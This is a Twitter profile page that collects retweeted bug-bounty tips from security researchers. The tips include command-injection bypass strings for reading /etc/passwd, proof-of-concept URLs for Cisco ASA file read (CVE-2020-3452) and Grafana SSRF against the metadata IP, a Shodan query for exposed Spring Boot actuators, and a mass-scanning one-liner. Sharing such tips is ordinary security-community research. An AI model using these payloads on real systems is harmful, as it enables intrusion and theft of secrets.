Rajat Karmarkar (@rajatk17) 's Twitter Profile
Rajat Karmarkar

@rajatk17

Not so active on twitter. 😪

ID: 178706326

linkhttp://www.cyberaon.com calendar_today15-08-2010 13:34:17

50 Tweet

229 Followers

132 Following

Shreyas R Gujar 🇮🇳 (@shreyasrx) 's Twitter Profile Photo

Command injection 💥 Filter Bypasses > 1/3 cat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pa's' swd cat /etc/pa??wd cat /etc/pa*wd cat /et' 'c/passw' 'd cat /et$()c/pa$()$swd #bugbountytips #shieldindia #commandinjection

YoKo Kho (@yokoacc) 's Twitter Profile Photo

SQL Injection in Email Address (username) - by Dimaz Arno Tips: "injection_here"[at]email[dot]com Bypassing Email Filter which leads to SQL Injection: medium.com/@dimazarno/byp…

SQL Injection in Email Address (username) - by <a href="/dimazarno/">Dimaz Arno</a>

Tips: "injection_here"[at]email[dot]com

Bypassing Email Filter which leads to SQL Injection:

medium.com/@dimazarno/byp…
sw33tLie (@sw33tlie) 's Twitter Profile Photo

org:YOUR_TARGET http.favicon.hash:116323821 Use this query on Shodan to find Spring Boot servers. Then check for exposed actuators. If /env is available you can probably achieve RCE. If /heapdump is accessible you may find private keys and tokens. #bugbountytips

org:YOUR_TARGET http.favicon.hash:116323821
Use this query on Shodan to find Spring Boot servers. Then check for exposed actuators. If /env is available you can probably achieve RCE. If /heapdump is accessible you may find private keys and tokens. #bugbountytips
Ahmed Aboul-Ela (@aboul3la) 's Twitter Profile Photo

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA &amp; Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://&lt;domain&gt;/+CSCOT+/translation-table?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../

Happy Hacking!
prin (@fuxksniper) 's Twitter Profile Photo

GraphQL — Common vulnerabilities & how to exploit them: link.medium.com/oiEg6EG6v5 Understanding Graphql : hackernoon.com/understanding-… Some good graphql stuff (Not by me) #bugbountytips #bugbountytips

Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

Check out Justin Gardner's blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana! rhynorater.github.io/CVE-2020-13379… POC: /avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254

Check out <a href="/Rhynorater/">Justin Gardner</a>'s blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana!  

rhynorater.github.io/CVE-2020-13379…

POC:

/avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254
👑 OFJAAAH 👑 (@ofjaaah) 's Twitter Profile Photo

👑 How did I find a critical today? well as i said it was very simple, using shodan and jaeles. 🔥shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ 🔥 @zeroc00I j3ssie (Ai Ho) #bugbountytip #KingOfBugBountyTips

👑 How did I find a critical today? well as i said it was very simple, using shodan and jaeles.

🔥shodan domain domain| awk '{print $3}'|  httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ 🔥

@zeroc00I <a href="/j3ssiejjj/">j3ssie (Ai Ho)</a> 
#bugbountytip #KingOfBugBountyTips
Jake Miller (@thebumblesec) 's Twitter Profile Photo

Excited to share my latest research! h2c smuggling: request smuggling via HTTP/2 cleartext. Leveraging TCP tunnels provided by HTTP/1.1 upgrades, we can initiate h2c connections directly with compatible back-end services, bypassing proxy access controls. labs.bishopfox.com/tech-blog/h2c-…

Excited to share my latest research! h2c smuggling: request smuggling via HTTP/2 cleartext. Leveraging TCP tunnels provided by HTTP/1.1 upgrades, we can initiate h2c connections directly with compatible back-end services, bypassing proxy access controls. labs.bishopfox.com/tech-blog/h2c-…
m4ll0k (@m4ll0k) 's Twitter Profile Photo

Many companies send data via POST data (json), I found a lot bugs like Request Arbitrary Path (IDORs), LFI, CRLF,… Example:

Many companies send data via POST data (json), I found a lot bugs like Request Arbitrary Path (IDORs), LFI, CRLF,…
Example:
InfoSec Community (@infoseccomm) 's Twitter Profile Photo

Things are heating up!🔥 Only 3 days left for #IWCon2022. Booked your tickets yet? Check out speakers and reserve your slot today: iwcon.live #infosec #hacking #bugbounty

Things are heating up!🔥

Only 3 days left for #IWCon2022. Booked your tickets yet? Check out speakers and reserve your slot today: iwcon.live

#infosec #hacking #bugbounty
Binni Shah (@binitamshah) 's Twitter Profile Photo

The Dirty Pipe Vulnerability : Allows Write Access with Root Privileges (affects all Linux machines running kernel version since 5.8) : dirtypipe.cm4all.com PoC : haxx.in/files/dirtypip…

Soroush Dalili (@irsdl) 's Twitter Profile Photo

Sharpener v1.09 is out. It is a must have extension for serious Burp users IMHO before its major UI revamp anyway. I don't know about you, but I cannot Burp properly without it!!! github.com/mdsecresearch/… #BurpSuite #MDSec #Extension #AppSec MDSec

Sharpener v1.09 is out. It is a must have extension for serious Burp users IMHO before its major UI revamp anyway. 

I don't know about you, but I cannot Burp properly without it!!!
github.com/mdsecresearch/…

#BurpSuite #MDSec #Extension #AppSec
<a href="/MDSecLabs/">MDSec</a>